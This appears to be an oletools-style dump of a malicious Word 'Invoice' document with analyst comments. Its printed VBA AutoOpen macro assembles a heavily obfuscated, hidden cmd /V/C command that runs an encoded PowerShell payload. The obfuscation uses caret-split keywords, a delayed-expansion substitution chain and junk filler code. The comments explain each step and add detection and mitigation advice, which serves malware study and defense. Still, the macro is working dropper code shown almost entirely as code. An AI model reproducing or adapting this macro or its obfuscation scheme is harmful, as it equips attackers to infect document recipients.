//Upload by @defconisov3r
//SHA256: 634dfff634ab6496975c3c89ec74d9b0abb61341e6c219b227a7e9c928b519d6
//VT link: https://www.virustotal.com/#/file/634dfff634ab6496975c3c89ec74d9b0abb61341e6c219b227a7e9c928b519d6/detection
Flags Filename
----------- -----------------------------------------------------------------
OLE:MAS-HB-- abacocomunitario.org_Invoice
===============================================================================
FILE: abacocomunitario.org_Invoice
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO iCGjuRj.cls
in file: abacocomunitario.org_Invoice - OLE stream: u'Macros/VBA/iCGjuRj'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO jcHcCcqU.bas
in file: abacocomunitario.org_Invoice - OLE stream: u'Macros/VBA/jcHcCcqU'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
' Fragment 1 of 6 of the command line that AutoOpen concatenates and runs.
' Only the five string assignments and the final concatenation feed the return value.
' The VarType / IsArray calls and the "HjdKE = ..." assignments are filler: their
' operands are names that are never assigned in this listing, and HjdKE is never read.
Function jAXolAF()
    ' Suppresses the runtime errors the filler would otherwise raise (for example a
    ' division whose divisor is an unassigned name).
    On Error Resume Next
    VarType 89455 + mquJj / ibRzrz - 85918
    HjdKE = 61734 - 99722
    ' The four names around 34 are never assigned in this listing, so the Chr() call
    ' presumably reduces to Chr(34), a double quote (assumes no Option Explicit and no
    ' assignment elsewhere in the project; confirm).
    ' Joined with the "C" that AutoOpen prepends, this reads as a cmd invocation with
    ' /V (delayed variable expansion) and /C, followed by a quoted "set" of variable Qyi6.
    ' The carets are cmd escape characters; here they split keywords so that plain
    ' string matching on the command line misses them.
    PcBtbrpk = "md " + "/V/C" + CStr(Chr(aMPAEGzVSJiP + upqRhiJSvaof + 34 + GzELlppWbYSiSG + flrZiTwwjG)) + "S^e" + "^T^ ^" + " ^ Q" + "y^i" + "^6^=^p^"
    HjdKE = 66322 - HNGiUF - 92518 + wuPrDK
    HjdKE = Log(QLQVHo)
    IsArray 54951 / EOtLt
    ' Continuation of the Qyi6 value. With carets dropped it resembles a PowerShell
    ' invocation using "-e" followed by encoded data; several characters are still
    ' placeholders that the later "set" chain replaces.
    JOOIdvurc = "o^w^er" + "^%he^" + "l^l^" + " -e^ ^J" + "^#^B" + "^[" + "^#/^" + "E^#" + "^e^g^"
    HjdKE = Sqr(490307260)
    VarType Tan(RAJtfM)
    IsArray Cos(90078994)
    qkFzUNiJ = "#^9" + "^" + "#" + "^G4#ZQ" + "^B^" + "5^#C" + "?^" + "#.w^" + "B^i" + "#^" + "G^o^" + "#ZQ^Bj#" + "^H"
    HjdKE = swtuPv - DlBuX
    IsArray CDate(7)
    PczktabYK = "Q^#" + "I#B" + "O#^G" + "^U#^d" + "#^#:#/" + "c^#" + "Z^Q" + "B^" + "i#EM#^"
    VarType CBool(uNnTwP)
    JadXKKWSiq = ".#^Bp#G" + "^U" + "#" + "^." + "g^B^" + "?#^" + "`^%^#^J" + "^#" + "^Br"
    ' Return value: the five fragments in order.
    jAXolAF = PcBtbrpk + JOOIdvurc + qkFzUNiJ + PczktabYK + JadXKKWSiq
    VarType ijmBj / 60313 + iHIYOX / ssvoqZ
End Function

' Fragment 2 of 6. All thirteen strings continue the encoded Qyi6 value started in
' jAXolAF; nothing here is a command keyword. Filler statements as in jAXolAF.
Function KJVtVWukFcf()
    On Error Resume Next
    IsArray 23391 + CiQfJR
    IsArray 11241 * MPBVU
    VarType CStr(PKkwZI)
    BQBWOB = "^#E8#Z" + "^#^#" + "^9#" + "Cc^#" + "^" + "a#^B" + "?#H" + "^Q#c" + "^#^#}^" + "#C"
    VarType Tan(90)
    IsArray CByte(2)
    IsArray 99163 * QaVwnL - JMjdUl * oipuq
    HjdKE = CByte(90462 / CbPUKj)
    XrqUzEOAYcn = "^" + "8#" + "^Lw" + "B^?^#G" + "^U^#cwB" + "^?#`^" + "U#^" + "Lg" + "Bw^#" + "^G^U^#" + "d#^B" + "^"
    IsArray Rnd(59265 - ilVhYj - 75702 + bUZvmt)
    GBQqvOdbz = "l^#^H^I" + "#^d^" + "w^Bv" + "#" + "^G8^#Z" + "#^Bp#G" + "^" + "4" + "#Z^w^#"
    HjdKE = Cos(2024)
    HjdKE = Round(nLRdPc / zCALR)
    HjdKE = 17372 * disZGi / 14801 * ECdAm
    FRMczU = "^:^#" + "G" + "M^#.^w^" + "B'#C8^" + "#SgB" + "^z#E^4#" + "^MQB^Z^" + "#^" + "H" + "^U" + "#d" + "^Q#4^"
    IsArray iwnJiq + CbkIah * KsGtQ / 61226
    HjdKE = CCur(341707968)
    HjdKE = Oct(71202 / 22511)
    ijalBNf = "#" + "^E" + "^##a^" + "#B^?^" + "#HQ#" + "c" + "^##}^"
    HjdKE = Hex(90717 / GSqTT * RSJmo / ihaCN)
    idjuUwLuiS = "#C" + "8^" + "#^L^" + "wB^" + ":#^G^U#" + "dw^#^" + ":#^G" + "^g^#a^Q" + "^B^%#GE"
    HjdKE = 46405 + 46326
    HjdKE = WQzFA * rICSd
    IsArray 68633 * SqIXR + mcMqc + 11946
    IsArray Rnd(38392 * unKjJ)
    IsArray CDec(wTvql)
    VarType bTHHJi + uBKhns
    UqwzowfTLwL = "^#cg^B^" + "p^#G^" + "8#dQ" + "^B^z" + "#C4^#" + "^YgB" + "l#C^" + "8#" + "c^Q^" + "BK#G^8#" + "c^w^" + "Br^#H" + "c^#^"
    VarType Oct(NBaSsU)
    VarType Cos(zmnuR)
    VarType Sqr(LUZlD)
    VarType Tan(cGwHb)
    IsArray XhawXp - 34068 / 6151 - ddbWfQ
    VarType Oct(EYEhTm)
    FtBwBuzQfV = "Q^#^Bo^" + "#HQ^" + "#^d#B" + "^w" + "#^`^" + "o^#Lw^#" + "v^" + "#^G?^#Y" + "QBy#"
    HjdKE = CCur(sDnfwC)
    VarType 54269 * ObbVi
    mZlGakhFv = "^GM" + "#aQBh^" + "#^Gw" + "^#ZwBh#" + "^HI#^" + "Y" + "wBp^#" + "G^E#^Lg"
    VarType Val(nzmfzs - jUdAU + hpWSAc / wLwii)
    HjdKE = cwiwTW / uAAQY
    HjdKE = CDec(Puibb)
    dXYXiYSwIF = "B^" + "j^#^G8#" + "^.Q#^:^" + "#^GI^#c" + "^g^"
    VarType CDate(JjCXJr)
    VarType 84591 * FRGSKV
    HjdKE = CDate(FtsRl)
    IsArray 6058 - BBiJl + CYbwEr * VjGSBK
    IsArray CDate(DjzAu / vSsrJK)
    tzzDKdb = "#v#" + "EM^#_" + "^#^Bm^" + "#/^E^#^" + ".^g^B"
    VarType SHmvIm / zrdUsw * wQaON / szzZIn
    VarType TnDmr + hnozJ / 12224 - JSUXEH
    tZslsokKrl = "##Gg#^" + "d#B" + "^?" + "#H#^#" + "Og^#" + "v^#C^8#" + "d^wB5#" + "Hc" + "^" + "#L^g^B" + "'#^H^" + "U" + "^#^aw"
    HjdKE = CDate(kGDQw + 35174)
    VarType 54714 * DfMAR + wjbNP + bMouRc
    VarType nULhj / ZhAnW + caEHb * 67169
    btBzDtWj = "B?#G^8" + "^#^LgB^" + "y^#" + "^HU" + "#c^#^B" + "v^#G^%#"
    ' Return value: the thirteen fragments in order.
    KJVtVWukFcf = BQBWOB + XrqUzEOAYcn + GBQqvOdbz + FRMczU + ijalBNf + idjuUwLuiS + UqwzowfTLwL + FtBwBuzQfV + mZlGakhFv + dXYXiYSwIF + tzzDKdb + tZslsokKrl + btBzDtWj
    HjdKE = Sin(EUqBZK)
End Function

' Fragment 3 of 6. Eleven more strings of the encoded Qyi6 value; same filler pattern.
Function ImjkiBkZ()
    On Error Resume Next
    HjdKE = Hex(2)
    HjdKE = Rnd(8832)
    HjdKE = lhKjp + 97834
    fzmnaJYvJ = "L^gB^:" + "#^G^U^" + "#d^#" + "^#v#" + "/^M^" + "#Q#Bo" + "^#HQ#" + "d^#^B" + "^w^#" + "^`^o#" + "^" + "L^w#v#^" + "H^o^"
    VarType Val(zZZGjB)
    HjdKE = 99754 - vQdzvl * OTriu - UYwmii
    HjdKE = CVar(MJGSj / 24527 * LVzstu - 77227)
    dYKIfYC = "#Y^Q" + "Bp#" + "G4#" + "^YQ^B" + "^i#" + "^H^M#" + "^a^" + "Q^B^" + "w" + "#H^I" + "^#YQ#^:" + "^#G^I^#"
    VarType Atn(353827860)
    RFEHGiZ = "^.^" + "#" + "^B" + "v^" + "#" + "^Gc#^Lw" + "^Bw^#GY" + "#cgB^[^" + "#E8^#J" + "w" + "#:^#/^M" + "^#c" + "#^B^%#G"
    HjdKE = Month(411291583)
    HjdKE = Rnd(5)
    VarType Val(chWHiJ)
    MrwvPK = ",#^d^#" + "#^o#Cc#" + "Q^##n#" + "C," + "^#" + "Ow#^" + ",^#^Ec^" + "#^SwBH"
    IsArray Round(kkPRYs)
    kPSaKGKrctP = "^" + "#C^##" + "[^" + "Q#g" + "^#C" + "c" + "#N^##" + "^y#^" + "`,^#"
    VarType 87503 / UBwcnc - dvjkko + cwGqf
    IsArray Rnd(fhQrR)
    VarType 84771 - IjnLX * FPPnc - MrCCK
    HjdKE = VQliU * HFHsLu / 36289 / WSDrGl
    KjjiSDp = "J^w^#7" + "#C" + "Q^#c" + "^gB?^" + "#" + "^GY^#" + "[^Q" + "^#^," + "^#^G" + "U#^.g" + "B" + "^"
    IsArray Cos(1767)
    VarType TypeName(ovKdN)
    VarType CDbl(WUdSkO)
    zImbOtUvTza = "2#`^o^" + "#c^" + "#B^1" + "^" + "#GI^#" + ".^#^B" + "^p#^GM" + "^#K^"
    HjdKE = LCase(WTMBSJ / ImDJP - VQOiw - ttOvS)
    IsArray Month(lQNGWa - QdFUkb)
    HjdKE = Cos(251)
    uBwqwYiUz = "w^#" + "n^#/w^" + "#" + "^" + "J"
    VarType Hex(BRsfV)
    HjdKE = CVar(hXHvJt)
    icJjIOY = "^w" + "^#r^" + "#" + "C^Q^#R^" + "w^B^L" + "#Ec^#^K" + "w#n" + "^#C^" + "4#Z"
    VarType GNZwM * EVYln
    IsArray 6101 + KivMr - naSqIX + fzwjaP
    IsArray KmSXq / TUrCnu
    UidjZ = "QB^" + "4^#GU" + "^#Jw#7" + "#G" + "Y^#.w" + "^B^" + "y#^" + "GU#YQB" + "j#Gg#K"
    HjdKE = CDbl(VfoUL)
    HjdKE = Round(pjLHzE)
    HjdKE = Atn(6759)
    IsArray Str(NicjF)
    sFhBoRG = "^##,^#" + "/^,#^Z" + "gB^Q#C" + "^#^" + "#a" + "QB^:#C" + "#^#" + "^J#^B"
    ' Return value: the eleven fragments in order.
    ImjkiBkZ = fzmnaJYvJ + dYKIfYC + RFEHGiZ + MrwvPK + kPSaKGKrctP + KjjiSDp + zImbOtUvTza + uBwqwYiUz + icJjIOY + UidjZ + sFhBoRG
    IsArray Oct(3)
    VarType 65365 * uPKlEF - JmjEbk / GQwJM
End Function

' Fragment 4 of 6. Finishes the encoded Qyi6 value (the data ends in "==") and starts
' the chain of cmd "set" statements that rewrite it. Same filler pattern.
Function ZSKiLOqwKsl()
    On Error Resume Next
    HjdKE = Atn(dfDoKk)
    IsArray Oct(820)
    IsArray Str(94732 * ROSQjE)
    ZErjONNzN = "r#E8" + "^#Z^##" + "p#^H^%#" + "d#" + "^B^y#H^" + ",#" + "e^w#" + ",^#^E" + "^8#^UQ" + "^" + "B^}" + "^#C4"
    IsArray 1893 / SKAuvj + 27780 / izYdri
    HjdKE = 25055 * qmLZi + 5564 * zEERG
    jijnsZIoG = "^#R^#B" + "v^#^Hc" + "^#.g^B" + "^%^#" + "^G^8" + "#^YQB,#" + "E^Y^#^" + "a^" + "QB^%" + "#GU#^K#" + "^#,#" + "/" + ",^#^"
    VarType Val(9134)
    VarType 74595 * KzmwX
    IsArray Round(1)
    FriYjjlcfZ = "Z^g^BQ^" + "#C" + "w^" + "#^" + "I##^,^#" + "^H" + "I^"
    VarType CDbl(jYAoZ)
    IsArray CDate(QSmpAk + swqbw + WzlZhh - QwWAIk)
    kslMTwijjJQ = "#^d^#" + "B" + "m^#" + "C^,^" + "#^O^" + "w"
    IsArray CBool(63865 / YlIzZ / BjaRkM * UBLWt)
    IsArray CVar(iMozW)
    HjdKE = Rnd(zQfuIv)
    HjdKE = NJMiE - dKFBzh / 74963 - HrqhTv
    NjYZKIBbWip = "^BJ^" + "#^G4" + "^#^" + "d^gBv" + "#G^%#ZQ" + "#'" + "^" + "#E" + "," + "^"
    VarType Val(aclOj - otwaDN)
    CzHakr = "#" + "^d^" + "#^B^l#^" + "G^?" + "#I^##^," + "#" + "^" + "H^I^#"
    HjdKE = QCOjX / WzCudh
    HjdKE = LdQIzF / fWfifI / vqczN - YvHaQO
    bmSNKViO = "^d" + "#^B^m#^" + "`^%^#" + "^Y^g^B^" + "y" + "^#"
    VarType UCLdwl * mFFPak + 61338 + 66824
    YwHzzovJWD = "^G^U" + "#^YQ^Br" + "^#`^%#^" + "f" + "Q^Bj^#G" + "^E#^d#" + "^B^" + "j#" + "G" + "g^#" + "e^w^" + "B^9"
    HjdKE = Sin(HCMSdT * XPVqr)
    IsArray Atn(TwCdT)
    YikCquN = "#H^?#^" + "I#^#^g^" + "#" + "C^#" + "^" + "#^" + "I##g#C^" + "#"
    IsArray TypeName(3)
    HjdKE = LCase(DXuwNo)
    ' End of the encoded data ("==") followed by "&", the cmd command separator, and
    ' the start of the next "set".
    wnsvrG = "^#" + "I##^g#" + "C##^I##" + "g#C^#^#" + "^I^" + "##^g" + "^#C#^#I" + "##g#^#" + "==" + "& " + "S^e^"
    VarType CBool(YjwcX)
    ' First rewrite step: a new variable is set from !Qyi6:x=y!, the delayed-expansion
    ' form that substitutes one placeholder character in the previous value. This is
    ' why the command line needs /V.
    rolFrIcvwwK = "t ^ ^" + " ^" + "m^" + "a" + "^i=^!^Q" + "^y" + "i^6:^`=" + "D^" + "!&S" + "^e^T " + " ^ ^Y^"
    ' Return value: the eleven fragments in order.
    ZSKiLOqwKsl = ZErjONNzN + jijnsZIoG + FriYjjlcfZ + kslMTwijjJQ + NjYZKIBbWip + CzHakr + bmSNKViO + YwHzzovJWD + YikCquN + wnsvrG + rolFrIcvwwK
    VarType CStr(15)
    HjdKE = Round(FYVcwN)
    HjdKE = Oct(GodFk)
End Function

' Fragment 5 of 6. Contains only the middle of the "set" chain: each statement assigns
' a new variable from the previous one with a single character replaced
' (set NEW=!PREV:x=y!), separated by "&" or "&&". The readable command therefore
' exists only inside the cmd process at run time, not in the document or on the
' initial command line.
Function Elzojkj()
    On Error Resume Next
    VarType 48373 / EbwmH
    IsArray CStr(IujVK)
    VarType Oct(wUSDE)
    rnKMF = "o9=" + "^!^m" + "^a^i^:" + "/^=^" + "F^"
    IsArray Int(fbvRJ)
    HjdKE = Hex(YjGzl)
    VarType CVar(71594 * JRXOHp + 43103 / 89640)
    hibJd = "!&" + "& S^" + "Et ^ ^" + " ^Mg9^" + "i=^" + "!" + "^Y^o^9^" + ":" + "'^=^t" + "!&& s^" + "E" + "^T ^ "
    IsArray Round(57018 + JsjXj)
    tNwRnWprBsG = "^0^H" + "Y=^!^M" + "^g^9^" + "i" + "^:^" + "[=^P!& " + " S^e" + "t ^ ^ " + "^K^m=" + "!^0^HY" + "^"
    HjdKE = 19838 / EjPcjj - mULtOF / wmpfO
    wvdktS = ":" + "%=" + "s^!& " + "S^eT" + " ^ " + " ^ X"
    HjdKE = 74252 - CiDwjX / YBnKvp * bZcHzs
    VarType CDec(4798)
    HjdKE = kHScra + oMVfkq + FDsLY + vEkmD
    IsArray Sqr(74714 * tWXDLN * HKHrTs / wXjUMq)
    CsvcldcW = "^h=!" + "^K^" + "m" + ":#^=^A" + "!&" + " S^E^" + "t " + "^ ^" + " ^ qo" + "^"
    VarType 59402 / FMCjd
    IsArray Round(443)
    mKBwQVzTKM = "J^a=^" + "!^X^" + "h^" + ":^.^" + "=b!&& S"
    HjdKE = Rnd(1)
    IsArray CStr(8)
    HjdKE = TimeValue(jtAidY)
    IsArray 40354 / IRSki - 67037 + jhkJZH
    ZljjstFMz = "^e" + "T" + " ^ ^ " + "^7^8" + "F" + "=^!^q^" + "o^J^a^:" + "}^=6^" + "!&SE^t " + " ^ ^" + " ^1^k"
    IsArray doXrG + 77616
    stDOYWED = "^gx" + "=^!^" + "7^8F:?" + "^=0^!" + "&& s" + "^e^T" + " ^ ^" + "mq=^!" + "^" + "1^k^g" + "^x^:^,^" + "=^k^!&&"
    VarType Rnd(RLoNO + dYwiw + 75398 / ouMUMk)
    IsArray Log(jkraBu - obwEw)
    tjUYUNlLPz = "s^" + "E^" + "T ^" + " ^ ^ ^" + "x^WV" + "=!^mq^:" + "^5" + "=^3^" + "!&& " + " "
    ' Return value: the nine fragments in order.
    Elzojkj = rnKMF + hibJd + tNwRnWprBsG + wvdktS + CsvcldcW + mKBwQVzTKM + ZljjstFMz + stDOYWED + tjUYUNlLPz
    HjdKE = CDate(uVfzE)
End Function

' Fragment 6 of 6. Last two substitutions of the "set" chain, then "CALL %YhWq%",
' which executes the fully rewritten string, then the closing double quote.
Function CAwvdI()
    On Error Resume Next
    VarType Sgn(iXiAc)
    VarType 72533 + UqQhaz * 75721 - 24370
    FYYcuEm = "se" + "^t ^ Q" + "^" + "F^" + "4=!^x^W" + "V^:^" + ":^=^u" + "!&& " + " s^ET " + "^"
    VarType Hex(VirquK)
    VarType CDate(69163 - kwwwi - 36497 - tUGTnj)
    HjdKE = CDec(79378 - MmuhH + ZskktO - ZfNHk)
    IsArray CByte(34990 + 97914 * mimIiM + TuqKp)
    ' Ends with CALL %YhWq%: the final variable of the chain is handed back to cmd
    ' as a command.
    DEznAYUkwM = " ^" + " Y^h^" + "Wq" + "=!Q^F^" + "4^:^" + "_^" + "=T^!&" + " " + " C^a^L^" + "L %Y^" + "h^W" + "q% "
    VarType VQOzp / COZWf
    ' Same construction as in jAXolAF: the names around 34 are never assigned in this
    ' listing, so this presumably yields Chr(34) and closes the quote opened after /V/C.
    iqDSdsvA = " " + CStr(Chr(RpMYpzOS + iKvYORwDM + 34 + auDorRnBFc + hFlMuoSrc)) + " " + ""
    ' Return value: the three fragments in order.
    CAwvdI = FYYcuEm + DEznAYUkwM + iqDSdsvA
    HjdKE = DaBwGW * MzZaY
    HjdKE = Second(69617 * MXdLO - Jlbcn - 10846)
    HjdKE = rUJSo + QVbJt
    HjdKE = 51516 - fwiah * 83018 + 42705
End Function
-------------------------------------------------------------------------------
VBA MACRO ZvqYdDFdD.bas
in file: abacocomunitario.org_Invoice - OLE stream: u'Macros/VBA/ZvqYdDFdD'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
' Entry point. The scanner summary below classifies AutoOpen as AutoExec: it runs when
' the Word document is opened, provided macros are allowed to run.
' The single statement builds one command line and passes it to WScript.Shell.Run:
'   - ChrW(1 + 3 + 8 + 9 + 46) is ChrW(67), the letter "C", which completes the "md "
'     at the start of jAXolAF's return value.
'   - UOSVLtjFjkdrbZ, zQXKMuPDmBPw, JdPEZiKhHGumjm and tUEwiEhQmZzO are never assigned
'     in this listing, so they presumably contribute empty strings (confirm against
'     the full project).
'   - The second argument, 188069728 - 188069728, is 0, the window style that hides
'     the spawned window.
' NOTE(review): the "!" after Run looks like a type-declaration suffix used as noise;
' confirm how the VBA parser treats it before relying on the exact token in a signature.
' Detection: an Office process spawning cmd.exe, and a cmd command line combining /V,
' caret-split keywords, chained set NAME=!PREV:x=y! assignments and CALL %NAME%.
' Mitigation: block macros in documents from untrusted origins; the attack surface
' reduction rule that blocks Office applications from creating child processes stops
' this launch path.
' Reading the summary table: every "Hex String" row matches a numeric literal in the
' code (Sqr(490307260), Cos(90078994), CCur(341707968), Atn(353827860),
' Month(411291583), 188069728), and the two "Base64 String" rows match the module name
' jcHcCcqU and the /V/C switch. These are incidental matches, not encoded payload.
Sub AutoOpen()
    On Error Resume Next
    CreateObject("WScript.Shell").Run! ChrW(1 + 3 + 8 + 9 + 46) + UOSVLtjFjkdrbZ + zQXKMuPDmBPw + jAXolAF + KJVtVWukFcf + ImjkiBkZ + ZSKiLOqwKsl + Elzojkj + CAwvdI + JdPEZiKhHGumjm + tUEwiEhQmZzO, 188069728 - 188069728
End Sub
+------------+----------------------+-----------------------------------------+
| Type | Keyword | Description |
+------------+----------------------+-----------------------------------------+
| AutoExec | AutoOpen | Runs when the Word document is opened |
| Suspicious | Chr | May attempt to obfuscate specific |
| | | strings (use option --deobf to |
| | | deobfuscate) |
| Suspicious | ChrW | May attempt to obfuscate specific |
| | | strings (use option --deobf to |
| | | deobfuscate) |
| Suspicious | Shell | May run an executable file or a system |
| | | command |
| Suspicious | WScript.Shell | May run an executable file or a system |
| | | command |
| Suspicious | Run | May run an executable file or a system |
| | | command |
| Suspicious | CreateObject | May create an OLE object |
| Suspicious | Hex Strings | Hex-encoded strings were detected, may |
| | | be used to obfuscate strings (option |
| | | --decode to see all) |
| Suspicious | Base64 Strings | Base64-encoded strings were detected, |
| | | may be used to obfuscate strings |
| | | (option --decode to see all) |
| Hex String | 'I\x03\x07&' | 49030726 |
| Hex String | '\x90\x07\x89\x94' | 90078994 |
| Hex String | '4\x17\x07\x96' | 34170796 |
| Hex String | "58'\x86" | 35382786 |
| Hex String | 'A\x12\x91X' | 41129158 |
| Hex String | '\x18\x80ir' | 18806972 |
| Base64 | '\x8d\xc1\xdc\t\xca\ | jcHcCcqU |
| String | x94' | |
| Base64 | '\xfd_\xc2' | /V/C |
| String | | |
+------------+----------------------+-----------------------------------------+